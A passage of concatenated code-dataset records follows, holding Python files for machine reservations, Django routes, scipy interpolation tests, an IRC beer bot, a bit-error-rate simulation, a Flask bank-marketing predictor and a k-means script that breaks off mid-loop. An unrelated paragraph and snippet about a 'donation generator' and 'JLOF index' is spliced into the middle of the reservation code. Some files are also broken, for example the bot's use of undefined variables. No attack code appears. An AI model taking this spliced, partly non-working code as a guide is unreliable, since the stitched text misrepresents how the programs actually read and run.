db.MachineReservation.query\n q = q.filter(db.MachineReservation.machine_id == machine_id)\n if obsolete is not None:\n q = q.filter(db.MachineReservation.obsolete == obsolete)\n if user:\n q = q.filter(db.MachineReservation.user == user)\n if dev is not None:\n q = q.filter(db.MachineReservation.dev == dev)\n\n start = start if start else datetime.datetime.min\n end = end if end else datetime.datetime.max\n\n # convert to seconds from epoch\n from_db_period = db.MachineReservation.reservation_period\n epoch = \"1970-01-01\"\n from_db_start = func.timestampdiff(text(\"SECOND\"), epoch, db.MachineReservation.start)\n from_db_end = func.timestampdiff(text(\"SECOND\"), epoch, db.MachineReservation.end)\n new_start = func.timestampdiff(text(\"SECOND\"), epoch, start)\n new_end = func.timestampdiff(text(\"SECOND\"), epoch, end)\n new_period = reservation_period\n\n def is_intersecting_with_periodic_interval(res1_start, res1_end, res2_start, res2_end, res2_period):\n res2_interval = res2_end - res2_start\n return and_(res1_end > res2_start,\n not_(and_(\n res2_period - res2_interval >= res1_end - res1_start,\n not_(or_(\n (((res1_start - res2_start) % res2_period) + res2_period) % res2_period < res2_interval,\n (((res1_end - res2_start) % res2_period) + res2_period - 1) % res2_period < res2_interval\n ))\n )))\n\n # already reserved cyclical reservations intersecting with new single/cyclical 
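The donation generator above gates shelf items on a weekly check and scales quantities by the JLOF peak/low index. The core pattern, isolated into a small sketch (values illustrative):

```python
import math
import random

JLOF_INDEX = [5, 3, 1, 8, 9, 1, 2, 3, 5, 4, 3, 2, 6, 8, 9]

def weekly_quantity(day, low=20, high=30):
    # Shelf orders fire only on week boundaries of the day counter;
    # the index list must cover day // 7 weeks of simulation.
    if day % 7 != 0:
        return 0
    return random.randrange(low, high) * JLOF_INDEX[math.floor(day / 7)]
```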
reservation\n cyclical_both = and_(\n from_db_period.isnot(None),\n is_intersecting_with_periodic_interval(new_start, new_end, from_db_start, from_db_end, from_db_period)\n )\n\n # already reserved single reservations intersecting with new single reservation\n single_single = and_(\n not_(from_db_period.isnot(None)),\n or_(\n and_(new_start >= from_db_start, new_start < from_db_end),\n and_(new_end > from_db_start, new_end <= from_db_end),\n and_(new_start <= from_db_start, new_end >= from_db_end)\n ))\n\n # already reserved single reservations intersecting with new cyclic one\n single_cyclical = false() if new_period is None else\\\n and_(\n not_(from_db_period.isnot(None)),\n is_intersecting_with_periodic_interval(from_db_start, from_db_end, new_start, new_end, new_period)\n )\n\n return q.filter(or_(cyclical_both, single_single, single_cyclical))\n\n\ndef get_reservations(machine_id, start=None, end=None, user=None, obsolete=False, dev=False, reservation_period=None):\n # get reservations that are intersecting the specified interval for the specified machine and user\n # the searching interval can be periodic, given by reservation_period in seconds\n return _get_reservations_query(machine_id, start, end, user, obsolete, dev, reservation_period).all()\n\n\ndef get_machine_reservation_entry(machine, datetime_check=None, user=None):\n if datetime_check is None:\n datetime_check = datetime.datetime.now()\n q = db.MachineReservation.query\n q = q.filter(db.MachineReservation.machine_id == machine)\n q = q.filter(db.MachineReservation.obsolete == False)\n q = q.filter(db.MachineReservation.start < datetime_check)\n q = q.filter(db.MachineReservation.end > datetime_check)\n if user:\n q = q.filter(db.MachineReservation.user == user)\n reservation_entry = q.first()\n return reservation_entry\n\n\ndef reserve_machine(machine_id, user, interval=None, system_id=None, dev=False):\n machine = dbcommon.get_entity(db.Machine, machine_id)\n if dev:\n machine.dev_owner = user\n if machine.task and machine.shareable and not machine.dual_use_hw:\n dump_scenario = dbcommon.get_entity(db.Scenario, 'dump-os', False)\n # if previous dump task was unsuccessful do nothing\n # get last task, check if its ok\n q = db.session.query(db.Task)\n q = q.filter(db.Task.machine_used_id == machine.id)\n q = q.order_by(db.Task.submitted.desc())\n last_task = q.first()\n if last_task and not ((last_task.scenario_id == dump_scenario.id and last_task.completion_state == 'TASK_CMPLT_ALL_OK') or\n last_task.scenario_id != dump_scenario.id):\n return False\n\n machine.disabled_by = user\n machine.disabled_date = datetime.datetime.now()\n machine.interval = interval\n if machine.shareable:\n db.session.commit()\n switch_to_dev_mode(machine, system_id=system_id)\n return True\n\n\ndef is_multiple_day_reservation(reservation):\n start = reservation.get('start')\n end = reservation.get('end')\n\n start_day_end = datetime.datetime.strptime(start, \"%Y-%m-%d %H:%M:%S\").strftime(\"%Y-%m-%d 23:59:59\")\n start_day_end = datetime.datetime.strptime(start_day_end, \"%Y-%m-%d %H:%M:%S\")\n end = datetime.datetime.strptime(end, \"%Y-%m-%d %H:%M:%S\")\n if end > start_day_end:\n return True\n return False\n\n\ndef split_multiple_day_reservation(reservation):\n # split the reservation at the end of first day's reservation\n if not is_multiple_day_reservation(reservation):\n return reservation, {}\n start = reservation.get('start')\n end = reservation.get('end')\n reservation_id = reservation.get('id')\n system_id = reservation.get('system')\n 
dev = reservation.get('dev')\n machine_id = reservation.get('machine')\n user = reservation.get('user')\n reservation_period = reservation.get('reservation_period')\n\n dict_tail = {'id': reservation_id, 'system': system_id, 'dev': dev, 'machine': machine_id, 'user': user,\n 'reservation_period': reservation_period}\n\n start_day_end = datetime.datetime.strptime(start, \"%Y-%m-%d %H:%M:%S\").strftime(\"%Y-%m-%d 23:59:59\")\n next_day_start = datetime.datetime.strptime(start, \"%Y-%m-%d %H:%M:%S\")\n next_day_start += datetime.timedelta(days=1)\n next_day_start = next_day_start.strftime(\"%Y-%m-%d 00:00:00\")\n\n return dict({'start': start, 'end': start_day_end}, **dict_tail), dict({'start': next_day_start, 'end': end}, **dict_tail)\n\n\ndef divide_multiple_day_reservation(reservation):\n partial_reservations = []\n r = None\n temp_reservation = dict(reservation)\n while is_multiple_day_reservation(temp_reservation):\n r = split_multiple_day_reservation(temp_reservation)\n partial_reservations.append(r[0])\n temp_reservation = r[1]\n if r:\n partial_reservations.append(r[1])\n return partial_reservations\n","sub_path":"berta/berta/reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"82007973","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index,name=\"shopApp\"),\r\n path('aboutus/',views.aboutus,name=\"aboutus\"),\r\n path('contactus/',views.contactus,name=\"contactus\"),\r\n path('tracker/',views.tracker,name=\"tracker\"),\r\n path('search/',views.search,name=\"search\"),\r\n path('checkout/',views.checkout,name=\"checkout\"),\r\n path('products/',views.productview,name=\"productview\"),\r\n]\r\n","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271505714","text":"import numpy as np\n#import sys\n#import os\n#import math\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nfrom mpl_toolkits.mplot3d import Axes3D\n#import numpy.matlib\nfrom scipy.optimize import fsolve\n#from scipy.optimize import brentq\n#from scipy.interpolate import griddata\n#from scipy.interpolate import CubicSpline\nfrom scipy.optimize import root\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy import interpolate\n#from scipy.interpolate import interpn\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import RBF, WhiteKernel, RationalQuadratic, ExpSineSquared, ConstantKernel as C\nimport warnings\n#from numpy import linalg as LA\n\n\ndef f(x):\n \"\"\"The function to predict.\"\"\"\n return x * np.sin(x)\n\nn = 40\nstatus_collect = np.ones(n*n)\nstatus_collect[20] = 0\nstatus_collect[300] = 0\nstatus_collect[400] = 0\n\na_grid = np.linspace(-1,1,n)\nx_grid = np.linspace(-1,1,n)\n\nAA, WW = np.meshgrid(a_grid, x_grid)\nA_A = AA.reshape((n*n, 1))\nW_W = WW.reshape((n*n, 1))\n#aw = np.column_stack((A_A, W_W))\n\na_star_old = (1/np.pi)*np.exp( np.abs(AA -WW)**(2))\n\nprint('a_star_old.shape',a_star_old.shape)\n\n#status_collect.reshape((n,n))\n\ncontrols_unemp = np.where(status_collect < 1.0)\n\nstatus_collect[430] = 3\n\ncontrols_emp = np.where(status_collect > 1.0)\n\njoint = controls_unemp + controls_emp\n\n\n\n\nfor i,j in enumerate(joint[0]):\n #aw[j,:] = 
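The SQL expression built in `_get_reservations_query` above encodes "does one interval hit any repetition of a periodic interval" in modular arithmetic over seconds-from-epoch. The same predicate in plain Python (Python's `%` is already non-negative for a positive modulus, so the `+period` normalization from the SQL version drops out; datetimes would first need converting to seconds):

```python
def intersects_periodic(s1, e1, s2, e2, period):
    """True if [s1, e1) overlaps [s2, e2) repeated every `period` seconds."""
    interval = e2 - s2
    if e1 <= s2:
        return False  # ends before the first repetition starts
    if period - interval < e1 - s1:
        return True   # the gaps are too short to ever contain [s1, e1)
    # otherwise it overlaps iff an endpoint lands inside some repetition
    return (s1 - s2) % period < interval or (e1 - s2 - 1) % period < interval

# busy [0, 2) every 10s: [9, 11) clips the second repetition, [8, 10) does not
assert intersects_periodic(9, 11, 0, 2, 10)
assert not intersects_periodic(8, 10, 0, 2, 10)
```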
np.PINF\n (x_nan, a_nan) = divmod(j, n)\n #print(a_nan,x_nan)\n AA[a_nan,x_nan] = np.PINF\n\n\nprint(AA.shape)\narray = np.ma.masked_invalid(AA)\nnewAA = AA[~array.mask]\nnewWW = WW[~array.mask]\nnewarr = a_star_old[~array.mask]\n\nprint('newAA.shape' , newAA.shape)\nprint('newWW.shape' , newWW.shape)\nprint('newarr.shape', newarr.shape)\na_func = lambda q,h: interpolate.griddata((newAA,newWW), newarr.ravel(),(q,h),method='cubic')\n\n''' \nfig = plt.figure()\nax = fig.gca(projection='3d')\nsurf = ax.plot_surface(AA, WW, a_func(AA,WW), cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\nfig.colorbar(surf, shrink=0.5, aspect=5)\nplt.show()\n\nprint(a_func(a_grid[20],x_grid[7]), (1/np.pi)*np.exp( np.abs(a_grid[20] - x_grid[7])**(2)) )\nprint(a_func(a_grid[20],x_grid[0]), (1/np.pi)*np.exp( np.abs(a_grid[20] - x_grid[0])**(2)) )\n'''\n\nn = 10j\n(x1,x2,x3,x4) = np.mgrid[0:5:n,0:5:n,0:5:n,0:5:2j]\n\n\nyy = x1*x2*x3*x4\n\n\n#print(x1.shape)\nx1 = x1.reshape((10*10*10*2,1))\nx2 = x2.reshape((10*10*10*2,1))\nx3 = x3.reshape((10*10*10*2,1))\nx4 = x4.reshape((10*10*10*2,1))\nyy = yy.reshape((10*10*10*2,1))\n\n\n#a_emp_func = lambda q, h, s: interpolate.interpn((x1,x2,x3),yy, (q, h, s), bounds_error=False, fill_value=None)\n #bounds_error=False, fill_value=None) #\n\n\n#print(x1.shape,yy.shape)\na_emp_func = interpolate.Rbf(x1,x2,x3,x4,yy)\n#print(a_emp_func(2,2,2,2))\n#print(a_emp_func(2,2,2))\n# Mesh the input space for evaluations of the real function, the prediction and\n# its MSE\nx = np.atleast_2d(np.linspace(0, 10, 10)).T\n\n\ndicts = {}\nE_func = {}\nkeys = range(4)\nvalues = [\"Hi\", \"I\", \"am\", \"John\"]\nfor i in keys:\n dicts[i] = values[i]\n E_func[i] = 'E_func_'+str(i)\nprint(dicts[1])\nprint(E_func)\nkernel = C(1.0, (1e-3, 1e-3)) * RBF(7, (1e-3, 1e2))\n\nE_func[1] = GaussianProcessRegressor(kernel=kernel, n_restarts_optimizer=10)\nkernel_bis = C(1.0, (1e-3, 1e-3)) * RBF(3, (1e-3, 1e2))\n\nE_func[2] = GaussianProcessRegressor(kernel=kernel_bis, n_restarts_optimizer=10)\n\n\nprint(E_func[1])\n\n# now the noisy case\nX = np.linspace(0.1, 9.9, 20)\nX = np.atleast_2d(X).T\n\n# Observations and noise\ny = f(X).ravel()\ndy = 0.5 + 1.0 * np.random.random(y.shape)\nnoise = np.random.normal(0, dy)\ny += noise\n\n# Instanciate a Gaussian Process model\n#gp = GaussianProcessRegressor(kernel=kernel, alpha=(dy / y) ** 2,\n# n_restarts_optimizer=10)\n\nE_func[1].fit(X, y)\n\n\ny_pred, sigma = E_func[1].predict(x, return_std=True)\nprint(y_pred)\nprint(sigma)\n\nE_func[2].fit(X, y)\n\ny_pred, sigma = E_func[2].predict(x, return_std=True)\nprint(y_pred)\nprint(sigma)\n\n\n''' \n#a_star_old = a_star_old.reshape((n,n))\n\narray = np.ma.masked_invalid(AA[:,0])\nnewAA = AA[~array.mask]\nnewWW = WW[~array.mask]\nnewarr = a_star_old[~array.mask]\n\n\n\n\nprint(a_func(newAA,newWW))\n#griddata\n\nfig = plt.figure()\nax = fig.gca(projection='3d')\n\nsurf = ax.plot_surface(AA, WW, a_func(AA,WW), cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\nfig.colorbar(surf, shrink=0.5, aspect=5)\n\nplt.show()\n\n\narray = np.ma.masked_invalid(a_star_old)\nnewaw = aw[~array.mask]\nnewarr = a_star_old[~array.mask]\n\nprint(array)\n\n\na_u_try = np.empty_like(grid)\n\nfor i,j in enumerate(grid):\n a_u_try[i] = a_func(i)\n\nfig, ax = plt.subplots(figsize=(9, 5))\nax.plot(grid, a_u_try, label='vabbe')\nplt.legend(loc='upper 
left')\n\n\nplt.show()\n'''","sub_path":"testingstuff.py","file_name":"testingstuff.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"621032867","text":"#! /usr/bin/env python\n# coding=utf8\n\nfrom BotModule import BotModule\nfrom BotCommand import BotCommand\n\nfrom time import *\n\nimport os, sys, random\n\nclass BeerModule(BotModule):\n\tdef __init__(self):\n\t\treturn\n\n\tdef command(self, command):\n\t\tlt = localtime()\t\n\t\tif command.command == \"!beer\" or command.command == \"!bier\":\n\t\t\tif 6 < lt[3] < 16:\n\t\t\t\tline = \"Kein Bier vor 4!\"\n\t\t\t\tcommand.answer(line)\n\t\t\telse:\n\t\t\t\tschmack = random.choice([\"leckeres\", \"wohltuendes\", \"wohlschmeckendes\", \"eisgekühltes\", \"lauwarmes\", \"abgestandenes\", \"schales\"])\n\t\t\t\tbeer = random.choice([\"Tannenzäpfle\", \"Höpfner\", \"Leikeim\", \"Becks\", \"Jever\", \"Öttinger\", \"Palmbräu\", \"Andechser Doppelbock\", \"Kölsch\", \"Veltins\"])\n\t\t\t\t\n\t\t\t\tcompliment = \"\"\n\t\t\t\treciever = nick\n\t\t\t\tif len(args) > 0:\n\t\t\t\t\treciever = args[0]\n\t\t\t\t\tcompliment = \" Mit freundlichen Grüßen von \" + nick\n\t\t\t\tline = \"gibt \" + reciever + \" ein \" + schmack + \" \" + beer + \".\" + compliment\n\n\t\t\t\tcommand.answer(line)\n\n\tdef help(self, nick):\n\t\tself.sendPrivateMessage(nick, \"!bier/!beer - Verteilt Bier.\")\n\t\treturn\n","sub_path":"modules/BeerModule.py","file_name":"BeerModule.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"276667697","text":"# -*- coding: utf-8 -*-\n#COMECE AQUI ABAIXO\nimport random\nprint('Bem vindo ao JogoDaVelha do Grupo 1 [Caio,Hugo,Anderson,Juan]') \na = input('Digite seu nome:')\nb = input('Digite qual simbolo você quer usar, X ou O : ')\nwhile b!= 'X' and b!= 'O':\n b = input('Digite qual simbolo você quer usar, X ou O : ')\n\ncomeço =random.randint(0,1)\nprint (começo)\n","sub_path":"moodledata/vpl_data/380/usersdata/310/87927/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"359876794","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 21 01:54:31 2017\r\n\r\n@author: LeviMe\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport random as rd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nNbSymboles=1000\r\nTs=1 #1 symbole/s\r\nTe=10\r\n\r\ndef phi(x):\r\n return (1/np.sqrt(2*np.pi)* np.exp(-x**2 /2))\r\n\r\ndef Phi(x):\r\n if (x==0):\r\n return 0.5\r\n if (x<0):\r\n return 1 - Phi(np.abs(x))\r\n if (x>0):\r\n s2=0\r\n t=np.linspace(0,x,2000)\r\n step=t[1]\r\n for k in t:\r\n s2+=phi(k)\r\n s2*=step\r\n return 0.5+s2\r\n \r\ndef to_list(A):\r\n Ap=[]\r\n for k in A:\r\n Ap+=[k]\r\n return Ap\r\n\r\nTEB=[]\r\nTEBtheo=[]\r\n\r\nrange_Eb_sur_N0_dB=np.linspace(0,6,6*10+1)\r\nfor Eb_sur_N0_dB in range_Eb_sur_N0_dB:\r\n\r\n ##############generation de symboles############################\r\n\r\n bits =[rd.randrange(0,2) for k in range(NbSymboles)]\r\n\r\n ##############Mapping des symboles##############################\r\n\r\n symboles=[2*bit-1 for bit in bits]\r\n \r\n ##############Multiplication par un peigne de dirac#############\r\n\r\n dirac=[1]+ [0]*(Te-1)\r\n suite_diracs_ponderes=to_list(np.kron(symboles,dirac))\r\n\r\n ###########Convolution par un filtre de mise en forme############\r\n\r\n 
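testingstuff.py above masks out infinite grid points before handing scattered samples to `griddata`. The idiom, minus the masked-array detour, as a sketch (`method="cubic"` matches the script):

```python
import numpy as np
from scipy import interpolate

def masked_interpolator(AA, WW, Z):
    ok = np.isfinite(AA) & np.isfinite(WW) & np.isfinite(Z)  # drop inf/NaN samples
    return lambda q, h: interpolate.griddata(
        (AA[ok], WW[ok]), Z[ok], (q, h), method="cubic")
```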
def convolve(U,V):\r\n        N1=len(U)\r\n        N2=len(V)\r\n\r\n        W=[]\r\n        for n in range(N1+N2-1):\r\n            s=0\r\n            for k in range(max(0,n-N2+1),min(n+1,N1)):\r\n                s+=U[k]*V[n-k]\r\n            W+=[s]\r\n        return W\r\n\r\n    shaping_filter=[1]*Te\r\n    shaped_signal=convolve(shaping_filter,suite_diracs_ponderes)\r\n\r\n    #########Add white Gaussian noise ###################################\r\n    Eb_sur_N0=10**(Eb_sur_N0_dB/10) # dB to linear is a power of ten, not a product\r\n    sigma_n_carre=(sum(shaping_filter[k]**2 for k in range(Te)) * np.var(symboles)**2)\r\n    sigma_n_carre/=(2*np.log2(2) * Eb_sur_N0)\r\n    sigma_n=np.sqrt(sigma_n_carre)\r\n    signal_bruite=[k + rd.normalvariate(0,sigma_n) for k in shaped_signal]\r\n\r\n    #########Convolution with the receive filter####################\r\n\r\n    reception_filter=[1]*(int)(Te/2)\r\n    signal_recu=convolve(reception_filter,signal_bruite)\r\n    signal_recu=[4*k/Te for k in signal_recu]\r\n\r\n    signal_detecte=[(signal_recu[-5+k*Te]) for k in range(1,NbSymboles*Ts+1)]\r\n    #print(signal_detecte)\r\n\r\n    ################Decision############################################\r\n\r\n    def decision(A):\r\n        M=[]\r\n        for k in A:\r\n            if ((abs(k+1) ) < (abs(k-1))):\r\n                M+=[0]\r\n            else:\r\n                M+=[1]\r\n        return M\r\n\r\n    bits_decides=decision(signal_detecte)\r\n\r\n    #############Statistics############################################\r\n\r\n    Teb=sum((bits[k]!=bits_decides[k]) for k in range(NbSymboles)) / NbSymboles\r\n    #print(\"Eb_sur_N0=\"+str(Eb_sur_N0)+\" Teb=\"+str(Teb*100)+\" %\")\r\n    \r\n    TEB+=[Teb]\r\n    TEBtheoCourant=1-Phi(np.sqrt(2*Eb_sur_N0))\r\n    TEBtheo+=[TEBtheoCourant]\r\n    print(str(Eb_sur_N0)+\" \"+str(Teb)+ \" \"+ str(TEBtheoCourant))\r\n    \r\n    \r\nplt.close()\r\nplt.plot(range_Eb_sur_N0_dB,TEB)\r\nplt.plot(range_Eb_sur_N0_dB,TEBtheo)\r\n\r\nplt.legend([\"TEB simulated\",\"TEB theory\"])\r\nplt.show()\r\n","sub_path":"code projet première année/code/Teb=f(sigma).py","file_name":"Teb=f(sigma).py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"458711379","text":"from flask import Flask, render_template, request\nimport numpy as np\nimport pandas as pd\nimport json\nimport plotly\nimport plotly.graph_objs as go\nimport pickle\n\ndef create_plot():\n\n    df = pd.read_csv('bank_clean.csv') # creating a sample dataframe\n\n    data = [\n\n        go.Pie(\n            labels = ['{}'.format(i) for i in list(df['y'].unique())],\n            values = [36548, 4640],\n            textinfo='label+percent',\n            textposition='inside',\n            hole = .3,\n        )\n    ]\n\n    graphJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n\n    return graphJSON\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n    return render_template('home.html')\n\n@app.route(\"/predict\")\ndef pred():\n    return render_template(\"predict.html\")\n\n@app.route(\"/visual\")\ndef visual():\n    bar = create_plot()\n    return render_template('visual.html', plot=bar)\n\n\n@app.route(\"/DataFrame\")\ndef data():\n    data = pd.read_csv('bank_clean.csv')\n    df = data.head(50).to_html(classes = 'data')\n    return render_template('data.html', tables=[df])\n\n@app.route(\"/result\", methods = [\"POST\",\"GET\"])\ndef result():\n    if request.method == \"POST\":\n        input = request.form\n\n        cpi = float(input['cpi'])\n\n        cci = float(input['cci'])\n\n        euribor = float(input['euribor'])\n\n        employee = float(input['employee'])\n\n        var = float(input['var'])\n        \n        age = int(input['age'])\n        \n        job = input['job']\n        if job == 'admin.':\n            strJob = 'Admin'\n            dataJob = 'admin.'\n        elif job == 'blue-collar':\n            strJob = 'Blue-Collar'\n            dataJob = 'blue-collar'\n        elif job == 
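The hand-rolled `Phi` integration in the Teb script above has a closed-form drop-in: for BPSK over AWGN, Pb = Q(sqrt(2·Eb/N0)) = 0.5·erfc(sqrt(Eb/N0)). A sketch assuming scipy is available, with the dB conversion done as a power of ten:

```python
import numpy as np
from scipy.special import erfc

def ber_bpsk_theory(eb_n0_db):
    eb_n0 = 10 ** (np.asarray(eb_n0_db) / 10.0)  # dB -> linear ratio
    return 0.5 * erfc(np.sqrt(eb_n0))            # Q(sqrt(2*Eb/N0))
```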
'entrepreneur':\n            strJob = 'Entrepreneur'\n            dataJob = 'entrepreneur'\n        elif job == 'housemaid':\n            strJob = 'Housemaid'\n            dataJob = 'housemaid'\n        elif job == 'management':\n            strJob = 'Management'\n            dataJob = 'management'\n        elif job == 'retired':\n            strJob = 'Retired'\n            dataJob = 'retired'\n        elif job == 'self-employed':\n            strJob = 'Self-employed'\n            dataJob = 'self-employed'\n        elif job == 'services':\n            strJob = 'Services'\n            dataJob = 'services'\n        elif job == 'student':\n            strJob = 'Student'\n            dataJob = 'student'\n        elif job == 'technician':\n            strJob = 'Technician'\n            dataJob = 'technician'\n        else:\n            strJob = 'Unemployed'\n            dataJob = 'unemployed'\n\n        marital = input['marital']\n        if marital == 'married':\n            strMarital = 'Married'\n            dataMarital = 'married'\n        elif marital == 'single':\n            strMarital = 'Single'\n            dataMarital = 'single'\n        else:\n            strMarital = 'Divorced'\n            dataMarital = 'divorced'\n\n        default = input['default']\n        if default == 'yes':\n            strDefault = 'Yes'\n            dataDefault = 'yes'\n        elif default == 'no':\n            strDefault = 'No'\n            dataDefault = 'no'\n        else:\n            strDefault = 'Unknown'\n            dataDefault = 'unknown'\n\n        month = input['month']\n        if month == 'jan':\n            strMonth = 'January'\n            dataMonth = 'january'\n        elif month == 'feb':\n            strMonth = 'February'\n            dataMonth = 'february'\n        elif month == 'mar':\n            strMonth = 'March'\n            dataMonth = 'march'\n        elif month == 'apr':\n            strMonth = 'April'\n            dataMonth = 'april'\n        elif month == 'may':\n            strMonth = 'May'\n            dataMonth = 'may'\n        elif month == 'june':\n            strMonth = 'June'\n            dataMonth = 'june'\n        elif month == 'july':\n            strMonth = 'July'\n            dataMonth = 'july'\n        elif month == 'aug':\n            strMonth = 'August'\n            dataMonth = 'august'\n        elif month == 'sep':\n            strMonth = 'September'\n            dataMonth = 'september'\n        elif month == 'oct':\n            strMonth = 'October'\n            dataMonth = 'october'\n        elif month == 'nov':\n            strMonth = 'November'\n            dataMonth = 'november'\n        else:\n            strMonth = 'December'\n            dataMonth = 'december'\n\n        campaign = int(input['campaign'])\n\n        pdays = input['pdays']\n        if pdays == 'Contacted':\n            strPdays = 'Contacted'\n            dataPdays = 'Contacted'\n        else:\n            strPdays = 'Never contacted before'\n            dataPdays = 'Never contacted before'\n\n        poutcome = input['poutcome']\n        if poutcome == 'success':\n            strPoutcome = 'Success'\n            dataPoutcome = 'success'\n        elif poutcome == 'failure':\n            strPoutcome = 'Failure'\n            dataPoutcome = 'failure'\n        else:\n            strPoutcome = 'Nonexistent'\n            dataPoutcome = 'nonexistent'\n\n\n        education = input['education']\n        if education == 'basic.4y':\n            strEducation = 'Basic.4y'\n            dataEducation = 'basic.4y'\n        elif education == 'basic.6y':\n            strEducation = 'Basic.6y'\n            dataEducation = 'basic.6y'\n        elif education == 'basic.9y':\n            strEducation = 'Basic.9y'\n            dataEducation = 'basic.9y'\n        elif education == 'high.school':\n            strEducation = 'High School'\n            dataEducation = 'high.school'\n        elif education == 'professional.course':\n            strEducation = 'Professional Course'\n            dataEducation = 'professional.course'\n        elif education == 'university.degree':\n            strEducation = 'University Degree'\n            dataEducation = 'university.degree'\n        else:\n            strEducation = 'Unknown'\n            dataEducation = 'unknown' # fallback keeps both variables bound for unlisted categories\n        \n\n\n\n        feature = pd.DataFrame({\n            'age' : [age],\n            'job' : [dataJob],\n            'marital' : [dataMarital],\n            'education' : [dataEducation],\n            'default' : [dataDefault],\n            'month' : [dataMonth],\n            'campaign' : [campaign],\n            'pdays' : [dataPdays],\n            'poutcome' : [dataPoutcome],\n            'emp.var.rate' : [var],\n            'cons.price.idx' : [cpi],\n            'cons.conf.idx' : [cci],\n            'euribor3m' : [euribor],\n            'nr.employed' : [employee]\n        })\n\n        proba = loadModel.predict_proba(feature)[:,1]\n        
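Ladders like the ones above are easy to mistype, because each branch repeats both the display label and the data value. A lookup-table sketch for the job field (values taken from the branches above; helper name is illustrative):

```python
JOB_LABELS = {
    "admin.": "Admin", "blue-collar": "Blue-Collar",
    "entrepreneur": "Entrepreneur", "housemaid": "Housemaid",
    "management": "Management", "retired": "Retired",
    "self-employed": "Self-employed", "services": "Services",
    "student": "Student", "technician": "Technician",
}

def map_job(job):
    # display label and data value live side by side; one default covers the rest
    label = JOB_LABELS.get(job, "Unemployed")
    data = job if job in JOB_LABELS else "unemployed"
    return label, data
```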
print(proba)\n\n        if proba < 0.33:\n            rslt = 'Non-Potential Client'\n        else:\n            rslt = 'Potential Client'\n\n        return render_template('result.html', cpi = cpi, cci = cci, var = var, euribor = euribor, age = age, \n        job = strJob, marital = strMarital, month = strMonth, default = strDefault, campaign = campaign, pdays = strPdays,\n        poutcome = strPoutcome, education = strEducation, employee = employee, result = rslt)\n\n\n\n\nif __name__ == '__main__':\n    loadModel = pickle.load(open('randomforest.sav', 'rb'))\n    app.run(debug=True, port = 8050)\n","sub_path":"dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"553623670","text":"# in how many substrings are adjacent characters consecutive in the alphabet?\n\n# O(n^2)\ndef calc(s):\n    n = len(s)\n    count = 0\n    for i in range(n):\n        for j in range(i,n):\n            if i != j and abs(ord(s[j-1])-ord(s[j])) != 1:\n                break\n            print(s[i:j+1])\n            count += 1\n    return count\n\n# O(n)\ndef calc2(s):\n    n = len(s)\n    count = 0\n    length = 0\n    for i in range(n):\n        if i != 0 and abs(ord(s[i-1])-ord(s[i])) == 1:\n            length += 1\n        else:\n            length = 1\n        count += length\n        print('position', i, 'ends', length, 'substrings')\n    # aabaca\n    #  ^ 3 substrings end at this position\n    # aabaca\n    #      ^ 1 substring ends at this position\n    return count\n\n\n#print(calc('aabaca'))\nprint(calc2('aabaca'))\n\ntest_string = \"ab\"*50000\n#print(calc(test_string))\n#print(calc2(test_string))\n","sub_path":"2_Tehokkuus/teoria/substrings.py","file_name":"substrings.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"301996826","text":" # coding=utf-8\r\n\r\nfrom numpy import *\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\n\r\n# load the data\r\ndef loadDataSet(fileName): # parse the file, split the fields, and build a matrix of floats\r\n    dataMat = []              # the last field of the file is the class label\r\n    with open(fileName, 'r', encoding='utf-8') as f:\r\n        readerf = csv.reader(f)\r\n        data_line = list(readerf)\r\n        for data in data_line[1:]:\r\n            dataMat.append(list([float(data[10]), float(data[15])]))\r\n    return dataMat\r\n\r\n    # compute the Euclidean distance\r\ndef distEclud(vecA, vecB):\r\n    return sqrt(sum(power(vecA - vecB, 2))) # distance between two vectors\r\n\r\n    # build cluster centers: pick k random centroids\r\ndef randCent(dataSet, k):\r\n    n = shape(dataSet)[1]\r\n    centroids = mat(zeros((k,n)))   # each centroid has n coordinates; k centroids in total\r\n    for j in range(n):\r\n        minJ = min(dataSet[:,j])\r\n        maxJ = max(dataSet[:,j])\r\n        rangeJ = float(maxJ - minJ)\r\n        centroids[:,j] = minJ + rangeJ * random.rand(k, 1)\r\n    return centroids\r\n\r\n    # k-means clustering algorithm\r\ndef kMeans(dataSet, k, distMeans =distEclud, createCent = randCent):\r\n    m = shape(dataSet)[0]\r\n    clusterAssment = mat(zeros((m,2)))    # holds each sample's cluster and its distance to the centroid\r\n    # first column of clusterAssment: assigned center; second column: distance to that center\r\n    centroids = createCent(dataSet, k)\r\n    clusterChanged = True   # used to decide whether the clustering has converged\r\n    while clusterChanged:\r\n        clusterChanged = False;\r\n        for i in 